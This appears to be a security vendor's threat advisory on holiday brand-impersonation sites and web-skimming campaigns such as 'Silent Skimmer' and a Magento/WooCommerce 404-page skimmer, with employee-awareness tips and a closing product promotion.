Defending Your Online Presence: Holiday Brand Impersonation and Web Skimming

Background

During the holiday season, deceptive websites surge with nearly 78% of individuals encountering brand impersonation scams as threat actors impersonate legitimate ones to deceive users. These fraudulent sites mimic banks, eCommerce platforms, and trusted entities using tactics like cloning, mirroring, typosquatting, brandjacking, and scareware to ensnare users. Additionally, threat actors employ web skimming, covertly inserting malicious code into websites to extract data submitted through HTML forms, a sophisticated tool for data extraction attacks. In 2022, these deceptive sites caused losses of $8.8 billion. Unfortunately, many businesses remain unaware of these threats until they suffer financial or reputational damage.

New Campaigns

The “Silent Skimmer” is a financially motivated cyber group active in the Asia-Pacific (APAC) region. They target vulnerable online payment infrastructure, infiltrating web servers through flaws to collect consumers’ financial data using payment scraping techniques. They are proficient in Chinese and have victims in North America. Their tactics involve exploiting web application vulnerabilities, particularly in Internet Information Services (IIS). They use various tools and historically have exploited CVE-2019-18935. The campaign employs multiple techniques and deploys a Remote Access Tool (RAT) capable of various tasks. The group seeks global weaknesses in web applications, with a focus on servers lacking modern security technologies, especially those handling payment data.

Separately, an additional campaign has emerged, posing a significant threat to Magento and WooCommerce websites. This sophisticated campaign comprises three elements: a loader, a malicious attack code, and data exfiltration. The loader is a crucial JavaScript snippet facilitating the deployment of the attack code. The malicious attack code is multifunctional, carrying out tasks like data detection, disruption of the checkout process, and the injection of counterfeit forms. Data exfiltration sends stolen information to a command-and-control server.

Notably, the campaign targeting Magento and WooCommerce websites showcases three distinct variations, reflecting an evolving threat landscape. The attacker’s ability to make swift improvements is remarkable. The third variation stands out for cleverly using a website’s default 404 error page to hide malicious code, enhancing their evasion capabilities. Of concern is the persistence of malicious comments on the 404-error page even after removing the loaders from affected websites. This residual presence raises the possibility of the skimmer reactivating the attack, necessitating vigilant monitoring.

Mitigation Strategies

Many employees lack the essential skills to recognize deceptive websites. Cybersecurity training frequently overlooks emerging threats such as website spoofing, often treating them as end-user problems rather than substantial cybersecurity challenges. Closing this training gap is vital to mitigate the risks of phishing attacks, malware distribution, and data breaches orchestrated by disguised websites. Strengthening employees’ capacity to detect spoofed websites and related email schemes is crucial to fortify the organization’s overall cybersecurity readiness.

Organizations should train employees to:

1. Be cautious when receiving requests for money transfers, especially if the sender’s name and email address don’t align.
2. Always verify email addresses and be wary of vague, threatening, or persuasive emails, especially those with suspicious links.
3. Exercise skepticism with text messages containing links or requests, as urgency and enticing offers are common tactics employed by smishing attacks.
4. Familiarize yourself with social engineering tactics, such as exploiting authority and altruism, to recognize and resist manipulative schemes.
5. When navigating potentially deceptive websites, scrutinize the URL for misspellings or extra characters, prioritize secure sites (https://), and use domain lookup services for registration information. If uncertain, seek advice from colleagues or the IT department.

Conclusion

In the ever-evolving landscape of cybersecurity, the discovery of brand impersonation and web skimming is a stark reminder of the constant need for vigilance and adaptation in defense strategies. The use of advanced concealment techniques in these campaigns, including the innovative exploitation of the default 404 error page, underscores the need for organizations to remain proactive in their efforts to detect and mitigate such threats. Awareness, preparedness, and swift response are imperative to protect sensitive data and maintain the integrity of online platforms in the face of such sophisticated and evolving cyber threats.

CRITICALSTART® offers a pioneering solution to modern organizational challenges in aligning cyber protection with risk appetite through its Cyber Operations Risk & Response™ platform, award-winning Managed Detection and Response (MDR) services, and a dedicated human-led risk and security team. By providing continuous monitoring, mitigation, maturity assessments, and comprehensive threat intelligence research, they enable businesses to proactively protect critical assets with measurable ROI. Critical Start’s comprehensive approach allows organizations to achieve the highest level of cyber risk reduction for every dollar invested, aligning with their desired levels of risk tolerance.

References

1. https://cybersecuritynews.com/silent-skimmer-shopping-websites/
2. https://securityboulevard.com/2023/10/playing-dress-up-how-to-train-to-spot-websites-in-disguise/
3. https://gbhackers.com/threat-actors-abusing-404-pages/